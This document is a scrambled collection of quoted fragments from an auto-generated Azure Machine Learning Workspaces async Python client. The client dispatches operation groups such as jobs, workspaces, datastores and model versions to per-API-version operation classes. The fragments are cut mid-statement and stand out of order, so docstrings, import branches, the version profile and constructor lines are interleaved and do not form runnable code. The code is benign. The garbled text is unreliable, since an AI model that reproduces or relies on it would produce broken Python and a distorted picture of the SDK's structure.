if", "self._get_api_version('code_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif api_version", "* 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections')", ":class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if api_version == '2021-10-01': from", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as OperationClass elif api_version ==", "operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends", ":class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from", 
":class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif", "def runs(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version", "an operation group and its API version. The api-version parameter sets the default", "2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if api_version == '2021-10-01':", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else: raise ValueError(\"API", "from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API version {} does not", "api_version == 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass else: raise ValueError(\"API version", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif api_version ==", "import models return models elif api_version == '2022-05-01': from ..v2022_05_01 import models return", "'v1.0': from ..runhistory.aio.operations import RunOperations as OperationClass else: raise ValueError(\"API version {} does", "= self._get_api_version('environment_versions') if api_version 
== '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif", "does not have operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations", "'1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as OperationClass else: raise ValueError(\"API version {} does", "== 'v1.0': from ..runhistory.aio.operations import DeleteOperations as OperationClass else: raise ValueError(\"API version {}", "from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else: raise ValueError(\"API version {} does not", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "'1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0',", "DatastoresOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version ==", "== '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else: raise ValueError(\"API version {}", "API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: 
:class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version", "raise ValueError(\"API version {} does not have operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config,", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` *", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import Operations as OperationClass else: raise", "\"\"\" api_version = self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations as", "the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` *", "depends on the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif api_version ==", "'2021-10-01': from 
..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else: raise ValueError(\"API version {} does", ":class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if api_version == '2021-10-01': from", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-01-01-preview':", "Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends on the API version:", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2')", "and its API version. 
The api-version parameter sets the default API version if", "from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "* 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\"", "from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if api_version ==", "'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends on the", "not have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self):", "1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", 
"Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>`", ":class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations", "Operations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import Operations as OperationClass", "if api_version == 'v1.0': from ..runhistory.aio.operations import EventsOperations as OperationClass else: raise ValueError(\"API", "* 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if api_version ==", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-05-01': from", "raise ValueError(\"API version {} does not have operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config,", "does not have operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: 
:class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` *", "api_version = self._get_api_version('runs') if api_version == 'v1.0': from ..runhistory.aio.operations import RunsOperations as OperationClass", "not have operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self):", "operation group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif", "'2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else: raise ValueError(\"API version {} does", "version {} does not have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "(c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. 
See", "raise ValueError(\"API version {} does not have operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config,", "self._get_api_version('run_artifacts') if api_version == 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass else: raise", "== '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API version {}", "* 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas')", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends on the API", ":class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if api_version == '2021-10-01': from", "* 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` *", "from ..dataset_dataplane import models return models elif api_version == '1.0.0': from 
..model_dataplane import", "version {} does not have operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API version {} does", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2')", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends on the API version:", "* 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "ready contains multiple API versions, to help you deal with all of the", "environment_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: 
:class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>`", ":class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations", "BatchEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "\"\"\" api_version = self._get_api_version('model_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as", "self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod def _models_dict(cls,", "operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends", "{} does not have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async", "{} does not have operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends on the API 
version: *", "For production, you should stick to a particular api-version and/or profile. The profile", "'2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "* v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from ..registry_discovery.aio.operations", "== 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API version {}", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_endpoints'\".format(api_version))", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'usages'\".format(api_version)) return", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_controller_v2'\".format(api_version)) return", "\"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs # type: Any ) -> None: self._config", "for LRO operations if no Retry-After header is present. 
\"\"\" DEFAULT_API_VERSION = '2022-05-01'", ":class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif api_version ==", "the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if api_version ==", "* 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0': from ..dataset_dataplane", "import ModelContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as", "does not have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "between an operation group and its API version. The api-version parameter sets the", "group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends on", "Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends on the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>`", "version if the operation group is not described in the profile. 
:param credential:", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version ==", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends on the API version: *", "ModelVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass", "run(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version =", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "def workspace_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview:", "DataContainerOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends on the API version:", "CodeContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass", "= self._get_api_version('data_call') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else:", "= '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 
'assets':", "if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif api_version ==", "@property def environment_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` *", "* 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "in the project root for # license information. # # Code generated by", "2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_containers'\".format(api_version)) return", "* 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version ==", "* 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if api_version == '1.5.0': from 
..dataset_dataplane.aio.operations", "from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "{} does not have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close() async def __aenter__(self):", "Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>`", "in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the", "\"\"\" api_version = self._get_api_version('model_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as", "have operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance", "have operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance", "not have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property 
def workspaces(self):", "ValueError(\"API version {} does not have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "datasets_v1(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version =", "2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01:", "MultiApiClientMixin from msrest import Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: #", "Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>`", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview import models return models elif api_version ==", "\"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as", "JobsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): 
\"\"\"Instance depends on the API", "clouds (Azure Stack, Azure Government, Azure China, etc.). By default, it uses the", "def _models_dict(cls, api_version): return {k: v for k, v in cls.models(api_version).__dict__.items() if isinstance(v,", "2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import", "not have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self):", "group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends on", "provided, or if missing in profile. 
:type api_version: str :param base_url: Service URL", "'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends on the", "API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01:", "'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\" )", "Machine Learning Workspace resources. This ready contains multiple API versions, to help you", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends on the API", "import WorkspacesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations as", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends on the API version:", "have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance", "== '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as OperationClass else: raise 
ValueError(\"API version {}", "import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends on the API version: *", "int polling_interval: Default waiting time between two polls for LRO operations if no", "from typing import Any, Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import", "you deal with all of the Azure clouds (Azure Stack, Azure Government, Azure", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call')", "self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) 